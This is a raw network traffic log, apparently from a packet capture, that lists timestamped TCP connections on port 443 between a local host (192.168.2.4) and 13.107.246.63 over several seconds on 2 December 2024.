                                                          Dec 2, 2024 17:56:49.694763899 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.694829941 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.694879055 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.695014000 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.695152044 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.695167065 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.695192099 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.695197105 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.701477051 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.701510906 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.701647043 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.702125072 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.702138901 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.305314064 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.306241989 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.306271076 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.307615995 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.307622910 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.600265026 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.601294994 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.601315022 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.602636099 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.602641106 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.622510910 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.623503923 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.623527050 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.624656916 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.624663115 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.740369081 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.743415117 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.743479013 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.743520021 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.743531942 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.743544102 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.743551970 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.747319937 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.747344971 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:50.747411013 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.747567892 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:50.747581959 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.035774946 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.039119005 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.039181948 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.039215088 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.039232969 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.039242983 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.039247990 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.042170048 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.042210102 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.042284012 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.042411089 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.042426109 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.076931000 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.080190897 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.080284119 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.080286026 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.080336094 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.080375910 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.080391884 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.080401897 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.080406904 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.083939075 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.083966017 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.084028959 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.084141970 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.084152937 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.223124981 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.223747969 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.223773956 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.225123882 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.225128889 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.595721960 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.596626043 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.596642971 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.597937107 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.597942114 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.675817013 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.675873041 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.676011086 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.676263094 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.676282883 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.676297903 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.676306009 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.678673029 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.678709030 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:51.678778887 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.678881884 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:51.678894997 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.049839973 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.052982092 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.053050995 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.053100109 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.053117990 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.053131104 CET49873443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.053136110 CET4434987313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.055903912 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.055939913 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.056005001 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.056127071 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.056138992 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.535033941 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.535670996 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.535698891 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.536982059 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.536988020 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.842091084 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.842739105 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.842771053 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.844029903 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.844037056 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.862729073 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.863092899 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.863105059 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:52.864243984 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:52.864249945 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064076900 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064101934 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064167976 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.064199924 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064266920 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064310074 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.064569950 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.064589977 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.064621925 CET49874443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.064630985 CET4434987413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.071142912 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.071176052 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.071254969 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.071414948 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.071429968 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.313628912 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.313685894 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.313783884 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.314275980 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.314290047 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.314366102 CET49876443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.314371109 CET4434987613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.320939064 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.320972919 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.321057081 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.321218967 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.321232080 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.347050905 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.350095987 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.350157976 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.350194931 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.350215912 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.350230932 CET49875443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.350235939 CET4434987513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.353965044 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.354000092 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.354070902 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.354211092 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.354223967 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.452692986 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.453181028 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.453208923 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.453783035 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.453788042 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.863919020 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.864552975 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.864578009 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.865000963 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.865006924 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.891248941 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.894176960 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.894284964 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.894372940 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.894390106 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.894412994 CET49877443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.894422054 CET4434987713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.900770903 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.900804043 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:53.900944948 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.901412964 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:53.901424885 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.310969114 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.313512087 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.313558102 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.313570976 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.313608885 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.313647985 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.313664913 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.313676119 CET49878443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.313680887 CET4434987813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.318979025 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.319017887 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.319087029 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.319266081 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.319278002 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.788666010 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.789141893 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.789169073 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:54.789743900 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:54.789750099 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.101691008 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.102442980 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.102478981 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.103677988 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.103684902 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.139429092 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.139930010 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.139952898 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.141252995 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.141258001 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.427504063 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.427740097 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.427944899 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.428253889 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.428270102 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.428318977 CET49879443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.428323984 CET4434987913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.433746099 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.433779955 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.433857918 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.434020042 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.434032917 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.546291113 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.549232006 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.549283028 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.549391031 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.549391031 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.549439907 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.549439907 CET49880443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.549457073 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.549465895 CET4434988013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.553836107 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.553869009 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.553961039 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.554286003 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.554297924 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.583813906 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.587039948 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.587196112 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.587253094 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.587274075 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.587284088 CET49881443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.587290049 CET4434988113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.591337919 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.591351986 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.591453075 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.591598988 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.591610909 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.683845997 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.684561014 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.684585094 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:55.685884953 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:55.685890913 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.128669024 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.131865978 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.131927013 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.132107019 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.132107019 CET49882443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.132128000 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.132137060 CET4434988213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.136993885 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.137026072 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.137105942 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.137269974 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.137281895 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.181334972 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.181807995 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.181832075 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.182132959 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.182137966 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.635651112 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.639534950 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.639753103 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.639753103 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.639753103 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.644092083 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.644134045 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.644239902 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.644426107 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.644439936 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:56.942610979 CET49883443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:56.942639112 CET4434988313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.242705107 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.243340015 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.243375063 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.244640112 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.244646072 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.345247030 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.345993042 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.346013069 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.347275972 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.347280979 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.687284946 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.690565109 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.690606117 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.690690994 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.690735102 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.690828085 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.690846920 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.690859079 CET49884443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.690865040 CET4434988413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.695024967 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.695058107 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.695158005 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.695367098 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.695384979 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.792480946 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.795594931 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.795658112 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.795691013 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.795691013 CET49885443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.795708895 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.795717001 CET4434988513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.800543070 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.800573111 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.800676107 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.800842047 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.800854921 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.931442022 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.931926966 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.931952953 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:57.933161974 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:57.933166981 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.383177042 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.383850098 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.383876085 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.385175943 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.385181904 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.395828009 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.398885965 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.398987055 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.399152994 CET49887443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.399174929 CET4434988713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.405330896 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.405359030 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.405495882 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.405951977 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.405966043 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.855973959 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.859023094 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.859070063 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.859082937 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.859124899 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.859174013 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.859190941 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.859200954 CET49888443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.859206915 CET4434988813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:58.862945080 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.862993956 CET4434989213.107.246.63192.168.2.4
